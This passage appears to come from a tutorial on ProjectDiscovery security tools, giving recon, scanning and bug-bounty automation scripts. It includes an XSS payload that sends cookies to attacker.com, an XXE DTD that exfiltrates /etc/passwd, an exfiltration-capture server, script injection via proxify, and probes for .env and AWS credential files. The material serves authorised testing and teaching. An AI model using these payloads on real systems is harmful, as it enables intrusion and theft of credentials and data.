wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/subdomains-top1million-110000.txt
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/directory-list-2.3-medium.txt
echo "Security workstation setup complete!"
Scenario 2: Automated Tool Management
#!/bin/bash
# Script: daily_tool_maintenance.sh
LOG_FILE="/var/log/pdtm_maintenance.log"
DATE=$(date '+%Y-%m-%d %H:%M:%S')
echo "[$DATE] Starting daily tool maintenance" >> $LOG_FILE
# Check for updates
pdtm list | while read tool status; do
if [[ $status == *"outdated"* ]]; then
echo "[$DATE] Updating $tool" >> $LOG_FILE
pdtm update "$tool" 2>> $LOG_FILE
fi
done
# Update Nuclei templates
nuclei -update-templates -silent 2>> $LOG_FILE
# Verify tools are working
TOOLS=("nuclei" "subfinder" "httpx" "naabu" "katana")
for tool in "${TOOLS[@]}"; do
if command -v "$tool" &> /dev/null; then
echo "[$DATE] $tool: OK" >> $LOG_FILE
else
echo "[$DATE] $tool: MISSING - Reinstalling" >> $LOG_FILE
pdtm install "$tool" 2>> $LOG_FILE
fi
done
echo "[$DATE] Tool maintenance completed" >> $LOG_FILE
18. MapCIDR - CIDR Manipulation Utility
Overview
MapCIDR performs operations on CIDR ranges, including expanding ranges into individual IPs, aggregating overlapping ranges, slicing ranges into subnets, and counting addresses.
Installation
go install -v github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest
Basic Usage
# Expand CIDR to IPs
echo "192.168.1.0/24" | mapcidr
# Count IPs in CIDR
echo "10.0.0.0/8" | mapcidr -count
# Aggregate CIDRs
cat cidrs.txt | mapcidr -aggregate
# Slice CIDR
echo "192.168.0.0/16" | mapcidr -slice-size 256
Real-World Scenarios
Scenario 1: Network Security Assessment
# Target: Corporate network ranges
# Objective: Systematic security assessment
# Define corporate IP ranges
cat > corporate_ranges.txt << EOF
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
203.0.113.0/24
EOF
# Count total IPs
cat corporate_ranges.txt | mapcidr -count
# Output: Total IPs: 16,909,056
# Break into manageable chunks for scanning
cat corporate_ranges.txt | mapcidr -slice-size 1024 > scanning_chunks.txt
# Scan each chunk
cat scanning_chunks.txt | while read cidr; do
echo "Scanning $cidr"
naabu -cidr "$cidr" -top-ports 100 -o "scan_$(echo $cidr | tr '/' '_').txt"
done
Scenario 2: Cloud Infrastructure Mapping
# Target: Multi-cloud deployment
# Objective: Map and monitor cloud IP ranges
# AWS IP ranges
curl -s https://ip-ranges.amazonaws.com/ip-ranges.json | \
jq -r '.prefixes[] | select(.service=="EC2") | .ip_prefix' | \
head -100 > aws_ranges.txt
# Process AWS ranges
cat aws_ranges.txt | mapcidr -aggregate > aws_aggregated.txt
# Identify overlapping ranges
mapcidr -cl aws_ranges.txt,azure_ranges.txt -overlap
# Monitor for changes
diff aws_ranges_previous.txt aws_ranges.txt | \
grep ">" | cut -c 3- | \
mapcidr -count
Scenario 3: Penetration Testing Scope Management
# Target: Penetration testing engagement
# Objective: Manage testing scope and exclusions
# Define testing scope
cat > in_scope.txt << EOF
192.168.1.0/24
10.0.1.0/24
172.16.1.0/24
EOF
# Define exclusions
cat > exclusions.txt << EOF
192.168.1.1
192.168.1.254
10.0.1.1
172.16.1.1
EOF
# Calculate actual testing targets (comm requires sorted input)
cat in_scope.txt | mapcidr | sort > all_targets.txt
comm -23 all_targets.txt <(sort exclusions.txt) > testing_targets.txt
# Verify scope size
echo "Total targets for testing: $(cat testing_targets.txt | wc -l)"
# Generate testing batches
split -l 100 testing_targets.txt batch_
for batch in batch_*; do
mv "$batch" "${batch}.txt"
done
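Each renamed batch can then be scanned on its own or handed to a separate tester, keeping results attributable to a specific slice of the scope. A minimal sketch:
# Port-scan each batch of 100 targets separately
for batch in batch_*.txt; do
naabu -list "$batch" -top-ports 100 -o "ports_${batch%.txt}.txt"
done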
19. CDNCheck - CDN and Technology Detection
Overview
CDNCheck determines whether given DNS names or IP addresses are fronted by known CDN, WAF, or cloud providers, helping separate edge infrastructure from directly reachable origin hosts.
Installation
go install -v github.com/projectdiscovery/cdncheck/cmd/cdncheck@latest
Basic Usage
# Check CDN for domain
echo "example.com" | cdncheck
# Check multiple domains
cat domains.txt | cdncheck
# JSON output
echo "example.com" | cdncheck -json
# Check specific IP
echo "1.2.3.4" | cdncheck
Real-World Scenarios
Scenario 1: Web Application Security Assessment
# Target: E-commerce platform
# Objective: Understand infrastructure and bypass restrictions
# Identify CDN usage
cat ecommerce_domains.txt | cdncheck -json > cdn_analysis.json
# Extract direct IP addresses (cdncheck -json emits one JSON object per line)
jq -r 'select(.cdn == false) | .input' cdn_analysis.json > direct_ips.txt
# Identify CDN providers
jq -r 'select(.cdn == true) | [.input, (.provider // "")] | @csv' cdn_analysis.json > cdn_providers.csv
# Find potential CDN bypass opportunities
cat direct_ips.txt | httpx -silent -title > direct_access_check.txt
# Test for origin server exposure
cat cdn_providers.csv | while IFS=, read domain provider; do
# Common origin server patterns
for subdomain in origin direct admin; do
echo "$subdomain.$domain" | cdncheck
done
done
Scenario 2: Infrastructure Intelligence Gathering
# Target: Competitor analysis
# Objective: Understand technology stack and hosting choices
# Analyze competitor domains
cat competitor_domains.txt | cdncheck -json > competitor_cdn.json
# CDN distribution analysis
jq -r 'select(.cdn == true) | .provider' competitor_cdn.json | \
sort | uniq -c | sort -nr > cdn_market_share.txt
# Identify self-hosted vs CDN usage
TOTAL_DOMAINS=$(cat competitor_domains.txt | wc -l)
CDN_DOMAINS=$(jq -r 'select(.cdn == true) | .input' competitor_cdn.json | wc -l)
SELF_HOSTED=$((TOTAL_DOMAINS - CDN_DOMAINS))
echo "CDN Usage Analysis:"
echo "Total domains: $TOTAL_DOMAINS"
echo "Using CDN: $CDN_DOMAINS ($(( CDN_DOMAINS * 100 / TOTAL_DOMAINS ))%)"
echo "Self-hosted: $SELF_HOSTED ($(( SELF_HOSTED * 100 / TOTAL_DOMAINS ))%)"
Scenario 3: DDoS Protection Assessment
# Target: Critical business applications
# Objective: Assess DDoS protection capabilities
# Check protection services
cat critical_apps.txt | cdncheck -json | \
jq -r '[.input, (.cdn | tostring), (.provider // ""), (.waf // "" | tostring)] | @csv' > protection_analysis.csv
# Identify unprotected assets (second field is the CDN flag)
awk -F',' '$2 ~ /false/' protection_analysis.csv | cut -d',' -f1 | tr -d '"' > unprotected_assets.txt
# Verify WAF bypass possibilities
cat unprotected_assets.txt | while read domain; do
# Test for direct access
nslookup "$domain" | grep "Address:" | tail -n +2 | cut -d' ' -f2 | \
while read ip; do
curl -H "Host: $domain" "http://$ip" -I 2>/dev/null | head -1
done
done
20. AIx - AI-Powered Security Assistant
Overview
AIx integrates Large Language Models (LLMs) for security analysis, vulnerability assessment, and automated reporting.
Installation
go install -v github.com/projectdiscovery/aix/cmd/aix@latest
Configuration
# Configure OpenAI API key
export OPENAI_API_KEY="your_api_key_here"
# Configure other providers
aix config set provider anthropic
aix config set api_key "your_anthropic_key"
Basic Usage
# Analyze vulnerability scan results
nuclei -u https://target.com -json | aix analyze
# Generate security report
cat scan_results.json | aix report
# Ask security questions
echo "What are the risks of exposed .git directories?" | aix query
Real-World Scenarios
Scenario 1: Automated Vulnerability Analysis
# Target: Web application security assessment
# Objective: Intelligent vulnerability analysis and prioritization
# Run comprehensive scan
nuclei -u https://webapp.com -severity medium,high,critical -json > webapp_vulns.json
# AI-powered analysis
cat webapp_vulns.json | aix analyze --prompt "
Analyze these vulnerability scan results and provide:
1. Risk prioritization based on exploitability
2. Business impact assessment
3. Remediation recommendations
4. Detection evasion indicators
Format the response as a structured security report."
# Generate executive summary
cat webapp_vulns.json | aix summarize --audience executive --format markdown > executive_summary.md
# Technical remediation guide
cat webapp_vulns.json | aix remediate --format technical > remediation_guide.txt
Scenario 2: Threat Intelligence Integration
# Target: Suspicious network activity
# Objective: Contextual threat analysis
# Gather IOCs from security tools
cat suspicious_ips.txt | while read ip; do
echo "IP: $ip"
whois "$ip" | grep -E "(OrgName|Country)"
nmap -sV "$ip" | grep "open"
done > ioc_data.txt
# AI-powered threat analysis
cat ioc_data.txt | aix analyze --prompt "
Analyze these network indicators and provide:
1. Threat actor attribution possibilities
2. Attack pattern identification
3. Recommended defensive measures
4. Additional IOCs to monitor
Consider current threat landscape and TTPs."
# Generate threat report
aix query "Based on the analyzed IOCs, create a threat intelligence report suitable for sharing with other security teams"
Scenario 3: Security Awareness and Training
# Target: Security team education
# Objective: Generate training content from real findings
# Extract unique vulnerability types
jq -r '.["template-id"]' recent_findings.json | sort -u > vuln_types.txt
# Generate training content
cat vuln_types.txt | while read vuln_type; do
aix query "Explain $vuln_type vulnerability in simple terms:
1. What is it?
2. How is it exploited?
3. Real-world impact examples
4. Prevention methods
Format for security awareness training." > "training_$vuln_type.md"
done
# Create security scenarios
aix query "Create 5 realistic security incident scenarios based on common web application vulnerabilities for tabletop exercises"
21. Proxify - HTTP Proxy Tool
Overview
Proxify is a Swiss Army Knife proxy tool for HTTP/HTTPS traffic interception, modification, and analysis during security testing.
Installation
go install -v github.com/projectdiscovery/proxify/cmd/proxify@latest
Basic Usage
# Start proxy server
proxify
# Custom port
proxify -port 8080
# Save traffic to file
proxify -output traffic.txt
# JSON output
proxify -json -output traffic.json
Advanced Features
Traffic Filtering and Modification
# Filter by host
proxify -filter-host "target.com"
# Filter by HTTP methods
proxify -filter-method "POST,PUT"
# Modify requests/responses
proxify -replace-request "oldvalue:newvalue"
# Custom CA certificate
proxify -cert cert.pem -key key.pem
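Before pointing a browser or device at the proxy, it is worth sanity-checking it from the command line; -k is needed because proxify re-signs TLS certificates unless its CA is trusted:
# Send a test request through the local proxify listener
curl -x http://127.0.0.1:8080 -k -I https://target.com/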
Real-World Scenarios
Scenario 1: API Security Testing
# Target: Mobile application API
# Objective: Intercept and analyze API traffic
# Start proxify with custom configuration
proxify -port 8080 -json -output api_traffic.json &
PROXY_PID=$!
# Configure mobile device to use proxy (manual step)
echo "Configure mobile device proxy: IP:8080"
# Let application generate traffic for 10 minutes
sleep 600
# Stop proxy
kill $PROXY_PID
# Analyze API endpoints
jq -r '.[] | select(.request.method == "POST") | .request.url' api_traffic.json | sort -u > api_endpoints.txt
# Extract authentication tokens
jq -r '.[] | .request.headers.Authorization // empty' api_traffic.json | sort -u > auth_tokens.txt
# Find sensitive data in requests
jq -r '.[] | .request.body' api_traffic.json | grep -E "(password|token|key|secret)" > sensitive_data.txt
Scenario 2: Web Application Security Assessment
# Target: Complex web application
# Objective: Map application flow and identify vulnerabilities
# Start interactive proxy
proxify -port 8080 -verbose -output proxify.log &
# Set browser proxy to localhost:8080
# Browse application manually to generate traffic
# Extract all unique URLs
grep -oP 'https?://[^"\s]+' proxify.log | sort -u > discovered_urls.txt
# Identify form submissions
grep "POST" proxify.log | grep -oP 'https?://[^"\s]+' > form_endpoints.txt
# Test discovered endpoints with Nuclei
cat discovered_urls.txt | nuclei -t exposures/ -t vulnerabilities/
# Parameter extraction for fuzzing
grep -oP '\?[^"\s&]+' proxify.log | cut -d'=' -f1 | sort -u > parameters.txt
Scenario 3: Bug Bounty Traffic Analysis
# Target: Bug bounty program
# Objective: Systematic traffic analysis and vulnerability discovery
#!/bin/bash
# Script: bugbounty_proxy_analysis.sh
PROGRAM_NAME=$1
PROXY_PORT=8080
# Start proxify with comprehensive logging
proxify -port $PROXY_PORT -json -output "${PROGRAM_NAME}_traffic.json" -verbose &
PROXY_PID=$!
echo "Proxy started on port $PROXY_PORT"
echo "Configure browser proxy and browse target application"
echo "Press ENTER when traffic collection is complete"
read
# Stop proxy
kill $PROXY_PID
# Analysis phase
echo "Analyzing captured traffic..."
# Extract all endpoints
jq -r '.[] | .request.url' "${PROGRAM_NAME}_traffic.json" | sort -u > "${PROGRAM_NAME}_endpoints.txt"
# Find potential IDOR vulnerabilities
jq -r '.[] | select(.request.url | contains("id=") or contains("user=") or contains("account=")) | .request.url' "${PROGRAM_NAME}_traffic.json" > idor_candidates.txt
# Extract API endpoints
jq -r '.[] | select(.request.url | contains("/api/") or contains("/v1/") or contains("/v2/")) | .request.url' "${PROGRAM_NAME}_traffic.json" > api_endpoints.txt
# Find file upload endpoints
jq -r '.[] | select(.request.headers["Content-Type"] | test("multipart/form-data")) | .request.url' "${PROGRAM_NAME}_traffic.json" > upload_endpoints.txt
# Extract cookies and sessions
jq -r '.[] | .request.headers.Cookie // empty' "${PROGRAM_NAME}_traffic.json" | sort -u > session_tokens.txt
# Generate report
cat > "${PROGRAM_NAME}_analysis_report.md" << EOF
# Traffic Analysis Report - $PROGRAM_NAME
## Summary
- Total requests captured: $(cat "${PROGRAM_NAME}_traffic.json" | jq length)
- Unique endpoints: $(cat "${PROGRAM_NAME}_endpoints.txt" | wc -l)
- API endpoints: $(cat api_endpoints.txt | wc -l)
- IDOR candidates: $(cat idor_candidates.txt | wc -l)
- Upload endpoints: $(cat upload_endpoints.txt | wc -l)
## Next Steps
1. Test IDOR candidates with different user contexts
2. Analyze API endpoints for authorization bypasses
3. Test file upload functionality for unrestricted uploads
4. Analyze session management for weaknesses
EOF
echo "Analysis complete. Check ${PROGRAM_NAME}_analysis_report.md"
Advanced Integration
Proxify + Nuclei Integration
# Capture traffic and immediately test with Nuclei
proxify -output traffic.txt &
PROXY_PID=$!
# ... perform manual testing ...
kill $PROXY_PID
# Extract URLs and test
grep -oP 'https?://[^"\s]+' traffic.txt | sort -u | nuclei -t exposures/
Custom Request Modification
# Add custom headers to all requests
proxify -replace-request "User-Agent:CustomSecurityScanner/1.0"
# Inject XSS payloads into parameters
proxify -replace-request "param=value:param=<script>alert(1)</script>"
22. SimpleHTTPServer - Enhanced HTTP Server
Overview
SimpleHTTPServer is an enhanced Go version of Python's SimpleHTTPServer with additional security testing features.
Installation
go install -v github.com/projectdiscovery/simplehttpserver/cmd/simplehttpserver@latest
Basic Usage
# Start server on port 8080
simplehttpserver
# Custom port and directory
simplehttpserver -port 9000 -directory /var/www
# Enable HTTPS
simplehttpserver -https -cert cert.pem -key key.pem
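The HTTPS example needs a certificate and key; for lab use a throwaway self-signed pair is usually sufficient (file names match the example above):
# Generate a self-signed certificate/key pair for local testing
openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 365 -subj "/CN=localhost"
simplehttpserver -https -cert cert.pem -key key.pem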
Real-World Scenarios
Scenario 1: Payload Hosting for Security Testing
# Target: Cross-site scripting (XSS) testing
# Objective: Host malicious payloads for testing
# Create payload directory
mkdir -p payloads/{xss,ssrf,xxe}
# XSS payloads
cat > payloads/xss/payload.js << 'EOF'
// XSS payload for testing
document.location='http://attacker.com/steal?cookie='+document.cookie;
EOF
# SSRF payloads
cat > payloads/ssrf/test.txt << 'EOF'
SSRF test file - if you can read this, SSRF exists
EOF
# XXE payloads
cat > payloads/xxe/external.dtd << 'EOF'
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://attacker.com/exfil?data=%file;'>">
%eval;
%exfiltrate;
EOF
# Start server
simplehttpserver -port 8000 -directory payloads -log requests.log &
# Use in testing
echo "<script src='http://your-server:8000/xss/payload.js'></script>" > xss_test.html
Scenario 2: Exfiltration Server for Data Leakage Testing
# Target: Data exfiltration testing
# Objective: Capture exfiltrated data during security testing
#!/bin/bash
# Script: exfiltration_server.sh
mkdir -p exfil_data
cd exfil_data
# Start logging server
simplehttpserver -port 8000 -log ../exfil.log &
SERVER_PID=$!
echo "Exfiltration server started on port 8000"
echo "Use the following URLs for testing:"
echo " HTTP: http://your-server:8000/data?leaked=DATA"
echo " DNS: your-server.com (for DNS exfiltration)"
# Monitor for exfiltrated data
tail -f ../exfil.log | while read line; do
if [[ $line == *"GET"* ]]; then
TIMESTAMP=$(date '+%Y-%m-%d %H:%M:%S')
SOURCE_IP=$(echo "$line" | grep -oP '\d+\.\d+\.\d+\.\d+')
LEAKED_DATA=$(echo "$line" | grep -oP '(?<=leaked=)[^&\s]*')
if [ ! -z "$LEAKED_DATA" ]; then
echo "[$TIMESTAMP] Data leaked from $SOURCE_IP: $LEAKED_DATA"
echo "[$TIMESTAMP] $SOURCE_IP: $LEAKED_DATA" >> leaked_data.txt
fi
fi
done &
# Cleanup function
cleanup() {
kill $SERVER_PID 2>/dev/null
kill $! 2>/dev/null
echo "Exfiltration server stopped"
}
trap cleanup EXIT
read -p "Press ENTER to stop the exfiltration server"
Advanced Workflows
Multi-Tool Integration Pipelines
Comprehensive Asset Discovery Pipeline
#!/bin/bash
# Script: comprehensive_asset_discovery.sh
TARGET_DOMAIN=$1
OUTPUT_DIR="results_$(date +%Y%m%d_%H%M%S)"
mkdir -p "$OUTPUT_DIR"
echo "🎯 Starting comprehensive asset discovery for $TARGET_DOMAIN"
# Phase 1: Subdomain Discovery
echo "📡 Phase 1: Subdomain Discovery"
subfinder -d "$TARGET_DOMAIN" -silent > "$OUTPUT_DIR/subdomains_passive.txt"
echo " Passive subdomains: $(cat "$OUTPUT_DIR/subdomains_passive.txt" | wc -l)"
# Generate wordlist with alterx
echo -e "api\ndev\ntest\nstaging\nadmin\nportal" | alterx > "$OUTPUT_DIR/custom_wordlist.txt"
# Active subdomain brute-forcing (shuffledns requires a trusted resolver list, e.g. resolvers.txt)
shuffledns -d "$TARGET_DOMAIN" -w "$OUTPUT_DIR/custom_wordlist.txt" -r resolvers.txt -silent > "$OUTPUT_DIR/subdomains_active.txt"
echo " Active subdomains: $(cat "$OUTPUT_DIR/subdomains_active.txt" | wc -l)"
# Combine and deduplicate
cat "$OUTPUT_DIR/subdomains_passive.txt" "$OUTPUT_DIR/subdomains_active.txt" | sort -u > "$OUTPUT_DIR/all_subdomains.txt"
echo " Total unique subdomains: $(cat "$OUTPUT_DIR/all_subdomains.txt" | wc -l)"
# Phase 2: Live Host Discovery
echo "🔍 Phase 2: Live Host Discovery"
cat "$OUTPUT_DIR/all_subdomains.txt" | httpx -silent > "$OUTPUT_DIR/live_hosts.txt"
echo " Live hosts: $(cat "$OUTPUT_DIR/live_hosts.txt" | wc -l)"
# Phase 3: Technology Detection
echo "🛠️ Phase 3: Technology Detection"
cat "$OUTPUT_DIR/live_hosts.txt" | httpx -tech-detect -json > "$OUTPUT_DIR/technology_stack.json"
# Extract technologies
jq -r 'select(.tech != null) | [.url, .tech[]] | @csv' "$OUTPUT_DIR/technology_stack.json" 2>/dev/null > "$OUTPUT_DIR/technologies.csv"
# Phase 4: Port Scanning
echo "🔎 Phase 4: Port Scanning"
cat "$OUTPUT_DIR/all_subdomains.txt" | dnsx -silent -a | cut -d' ' -f2 | sort -u > "$OUTPUT_DIR/resolved_ips.txt"
naabu -list "$OUTPUT_DIR/resolved_ips.txt" -top-ports 1000 -silent > "$OUTPUT_DIR/open_ports.txt"
# Phase 5: Web Crawling
echo "🕷️ Phase 5: Web Crawling"
cat "$OUTPUT_DIR/live_hosts.txt" | head -20 | katana -depth 2 -silent > "$OUTPUT_DIR/crawled_urls.txt"
# Phase 6: Vulnerability Scanning
echo "🛡️ Phase 6: Vulnerability Scanning"
cat "$OUTPUT_DIR/live_hosts.txt" | nuclei -t exposures/ -t misconfiguration/ -silent -json > "$OUTPUT_DIR/vulnerabilities.json"
# Generate Summary Report
cat > "$OUTPUT_DIR/summary_report.md" << EOF
# Asset Discovery Summary Report
**Target:** $TARGET_DOMAIN
**Date:** $(date)
## Discovered Assets
- **Subdomains:** $(cat "$OUTPUT_DIR/all_subdomains.txt" | wc -l)
- **Live Hosts:** $(cat "$OUTPUT_DIR/live_hosts.txt" | wc -l)
- **Unique IPs:** $(cat "$OUTPUT_DIR/resolved_ips.txt" | wc -l)
- **Open Ports:** $(cat "$OUTPUT_DIR/open_ports.txt" | wc -l)
- **Crawled URLs:** $(cat "$OUTPUT_DIR/crawled_urls.txt" | wc -l)
- **Vulnerabilities:** $(jq -s length "$OUTPUT_DIR/vulnerabilities.json" 2>/dev/null || echo "0")
## Top Technologies
$(cut -d',' -f2 "$OUTPUT_DIR/technologies.csv" 2>/dev/null | sort | uniq -c | sort -nr | head -10)
## Critical Findings
$(jq -r 'select(.info.severity == "critical") | "- " + .info.name + " (" + .host + ")"' "$OUTPUT_DIR/vulnerabilities.json" 2>/dev/null)
## High Priority Targets
$(grep -E "(admin|login|portal|dashboard|api)" "$OUTPUT_DIR/live_hosts.txt" | head -10)
EOF
echo "✅ Discovery complete! Results saved in $OUTPUT_DIR/"
echo "📊 Summary report: $OUTPUT_DIR/summary_report.md"
Continuous Security Monitoring Pipeline
#!/bin/bash
# Script: continuous_security_monitoring.sh
TARGETS_FILE="$1"
MONITORING_DIR="monitoring_$(date +%Y%m%d)"
ALERT_THRESHOLD=3
mkdir -p "$MONITORING_DIR"/{daily,alerts,trends}
while true; do
DATE=$(date +%Y%m%d_%H%M)
DAILY_DIR="$MONITORING_DIR/daily/$DATE"
mkdir -p "$DAILY_DIR"
echo "🔄 Starting monitoring cycle at $(date)"
# Asset Discovery Changes
cat "$TARGETS_FILE" | while read domain; do
subfinder -d "$domain" -silent > "$DAILY_DIR/${domain}_subdomains.txt"
# Compare with previous day
PREV_FILE="$MONITORING_DIR/daily/$(date -d yesterday +%Y%m%d)*/${domain}_subdomains.txt"
if ls $PREV_FILE 2>/dev/null; then
comm -13 <(cat $PREV_FILE | sort) <(sort "$DAILY_DIR/${domain}_subdomains.txt") > "$DAILY_DIR/${domain}_new_assets.txt"
if [ -s "$DAILY_DIR/${domain}_new_assets.txt" ]; then
echo "🆕 New assets for $domain:" | tee -a "$MONITORING_DIR/alerts/asset_changes.log"
cat "$DAILY_DIR/${domain}_new_assets.txt" | tee -a "$MONITORING_DIR/alerts/asset_changes.log"
fi
fi
done
# Vulnerability Monitoring
cat "$TARGETS_FILE" | httpx -silent | nuclei -severity high,critical -json > "$DAILY_DIR/vulnerabilities.json"
VULN_COUNT=$(jq -s length "$DAILY_DIR/vulnerabilities.json")
if [ "$VULN_COUNT" -gt "$ALERT_THRESHOLD" ]; then
echo "🚨 High vulnerability count detected: $VULN_COUNT" | tee -a "$MONITORING_DIR/alerts/vulnerability_spike.log"
jq -r '"- " + .info.name + " (" + .host + ")"' "$DAILY_DIR/vulnerabilities.json" | tee -a "$MONITORING_DIR/alerts/vulnerability_spike.log"
fi
# Certificate Monitoring
cat "$TARGETS_FILE" | httpx -silent | tlsx -cert -expiry -json > "$DAILY_DIR/certificates.json"
# Check for expiring certificates (30 days)
jq -r 'select(.cert_expiry != null) | [.host, .cert_expiry] | @csv' "$DAILY_DIR/certificates.json" | tr -d '"' | \
while IFS=, read host expiry; do
expiry_timestamp=$(date -d "$expiry" +%s)
current_timestamp=$(date +%s)
days_until_expiry=$(( (expiry_timestamp - current_timestamp) / 86400 ))
if [ "$days_until_expiry" -lt 30 ]; then
echo "⏰ Certificate expiring soon: $host ($days_until_expiry days)" | tee -a "$MONITORING_DIR/alerts/cert_expiry.log"
fi
done
# Generate trends
echo "$DATE,$VULN_COUNT" >> "$MONITORING_DIR/trends/vulnerability_trend.csv"
sleep 3600 # Wait 1 hour
done
Bug Bounty Automation Pipeline
#!/bin/bash
# Script: bugbounty_automation.sh
PROGRAM_NAME="$1"
SCOPE_FILE="$2"
OUTPUT_DIR="bugbounty_${PROGRAM_NAME}_$(date +%Y%m%d)"
mkdir -p "$OUTPUT_DIR"/{reconnaissance,analysis,exploitation,reporting}
echo "🎯 Starting bug bounty automation for $PROGRAM_NAME"
# Phase 1: Comprehensive Reconnaissance
echo "📡 Phase 1: Reconnaissance"
cat "$SCOPE_FILE" | while read scope; do
echo " 🔍 Processing scope: $scope"
# Subdomain discovery
subfinder -d "$scope" -silent | tee -a "$OUTPUT_DIR/reconnaissance/all_subdomains.txt"
# Cloud asset discovery
if [[ "$scope" == *.* ]]; then
cloudlist -provider aws -domain "$scope" 2>/dev/null | tee -a "$OUTPUT_DIR/reconnaissance/cloud_assets.txt"
fi
# Historical data
chaos -d "$scope" -silent 2>/dev/null | tee -a "$OUTPUT_DIR/reconnaissance/historical_subdomains.txt"
done
# Deduplicate and resolve
sort -u "$OUTPUT_DIR/reconnaissance/all_subdomains.txt" > "$OUTPUT_DIR/reconnaissance/unique_subdomains.txt"
cat "$OUTPUT_DIR/reconnaissance/unique_subdomains.txt" | httpx -silent > "$OUTPUT_DIR/reconnaissance/live_targets.txt"
echo " 📊 Discovered $(cat "$OUTPUT_DIR/reconnaissance/unique_subdomains.txt" | wc -l) subdomains"
echo " ✅ $(cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | wc -l) live targets"
# Phase 2: Technology Analysis
echo "🛠️ Phase 2: Technology Analysis"
cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | httpx -tech-detect -title -status-code -json > "$OUTPUT_DIR/analysis/technology_fingerprint.json"
# Extract interesting technologies
jq -r 'select(.tech != null) | [.url, .tech[]] | @csv' "$OUTPUT_DIR/analysis/technology_fingerprint.json" > "$OUTPUT_DIR/analysis/tech_stack.csv"
# Identify high-value targets
grep -E "(admin|login|portal|dashboard|api|dev|staging|test)" "$OUTPUT_DIR/reconnaissance/live_targets.txt" > "$OUTPUT_DIR/analysis/high_value_targets.txt"
# Phase 3: Vulnerability Discovery
echo "🛡️ Phase 3: Vulnerability Discovery"
# General vulnerability scanning
cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | nuclei -t exposures/ -t misconfiguration/ -severity medium,high,critical -json > "$OUTPUT_DIR/exploitation/general_vulns.json"
# Technology-specific scanning
jq -r '.tech[]?' "$OUTPUT_DIR/analysis/technology_fingerprint.json" | sort -u | while read tech; do
echo " 🔎 Scanning for $tech vulnerabilities"
cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | nuclei -t "technologies/$tech" -json >> "$OUTPUT_DIR/exploitation/tech_specific_vulns.json" 2>/dev/null
done
# Web crawling for additional attack surface
echo "🕷️ Phase 4: Deep Crawling"
cat "$OUTPUT_DIR/analysis/high_value_targets.txt" | head -10 | katana -depth 3 -js-crawl -output "$OUTPUT_DIR/analysis/crawled_endpoints.txt"
# Look for sensitive files
echo "📁 Phase 5: Sensitive File Discovery"
cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | httpx -path "/.git/config,/.env,/config.json,/swagger.json,/.aws/credentials" -mc 200 > "$OUTPUT_DIR/exploitation/sensitive_files.txt"
# Phase 6: Report Generation
echo "📋 Phase 6: Report Generation"
# Count findings
TOTAL_VULNS=$(jq -s length "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null || echo "0")
CRITICAL_VULNS=$(jq -s '[.[] | select(.info.severity == "critical")] | length' "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null || echo "0")
HIGH_VULNS=$(jq -s '[.[] | select(.info.severity == "high")] | length' "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null || echo "0")
SENSITIVE_FILES=$(cat "$OUTPUT_DIR/exploitation/sensitive_files.txt" | wc -l)
# Generate executive summary
cat > "$OUTPUT_DIR/reporting/executive_summary.md" << EOF
# Bug Bounty Assessment - $PROGRAM_NAME
**Assessment Date:** $(date)
**Scope:** $(cat "$SCOPE_FILE" | wc -l) domains
**Methodology:** Automated reconnaissance and vulnerability assessment
## Executive Summary
### Asset Discovery
- **Total Subdomains:** $(cat "$OUTPUT_DIR/reconnaissance/unique_subdomains.txt" | wc -l)
- **Live Web Services:** $(cat "$OUTPUT_DIR/reconnaissance/live_targets.txt" | wc -l)
- **High-Value Targets:** $(cat "$OUTPUT_DIR/analysis/high_value_targets.txt" | wc -l)
### Security Findings
- **Total Vulnerabilities:** $TOTAL_VULNS
- **Critical:** $CRITICAL_VULNS
- **High:** $HIGH_VULNS
- **Sensitive Files Exposed:** $SENSITIVE_FILES
### Top Vulnerabilities
$(jq -r 'select(.info.severity == "critical" or .info.severity == "high") | "- **" + .info.name + "** (" + .host + ")"' "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null | head -10)
### Recommendations
1. Immediate attention required for critical and high-severity vulnerabilities
2. Review and secure exposed sensitive files
3. Implement proper access controls on administrative interfaces
4. Regular security assessments for discovered assets
## Detailed Findings
$(jq -r '.[] | "### " + .info.name + "\n**Severity:** " + .info.severity + "\n**Host:** " + .host + "\n**Description:** " + .info.description + "\n"' "$OUTPUT_DIR/exploitation/general_vulns.json" 2>/dev/null)
EOF
echo "✅ Bug bounty automation complete!"
echo "📊 Results saved in $OUTPUT_DIR/"
echo "📋 Executive summary: $OUTPUT_DIR/reporting/executive_summary.md"
# Optional: Send notification
if command -v notify &> /dev/null; then
echo "Bug bounty scan complete for $PROGRAM_NAME. Found $TOTAL_VULNS vulnerabilities ($CRITICAL_VULNS critical, $HIGH_VULNS high)" | notify -provider slack
fi
Real-World Case Studies
Case Study 1: Fortune 500 Financial Institution Assessment
Background: A major financial institution required a comprehensive security assessment of their digital infrastructure including web applications, APIs, and cloud services.
Scope:
- 50+ primary domains
- Cloud infrastructure across AWS, Azure, and GCP
- Mobile banking applications
- Partner integrations
Methodology:
#!/bin/bash
# Case Study 1: Financial Institution Assessment
COMPANY="megabank"
SCOPE_FILE="megabank_scope.txt"
RESULTS_DIR="assessment_${COMPANY}_$(date +%Y%m%d)"
mkdir -p "$RESULTS_DIR"/{discovery,enumeration,vulnerabilities,compliance,reporting}
echo "🏦 Starting comprehensive assessment for $COMPANY"
# Phase 1: Asset Discovery
echo "📡 Phase 1: Comprehensive Asset Discovery"
# Primary domain enumeration
cat "$SCOPE_FILE" | while read domain; do
echo " Processing $domain"
# Passive reconnaissance
subfinder -d "$domain" -all -silent >> "$RESULTS_DIR/discovery/all_subdomains.txt"
# Certificate transparency logs
chaos -d "$domain" -silent >> "$RESULTS_DIR/discovery/ct_logs.txt"
# ASN enumeration for comprehensive IP mapping
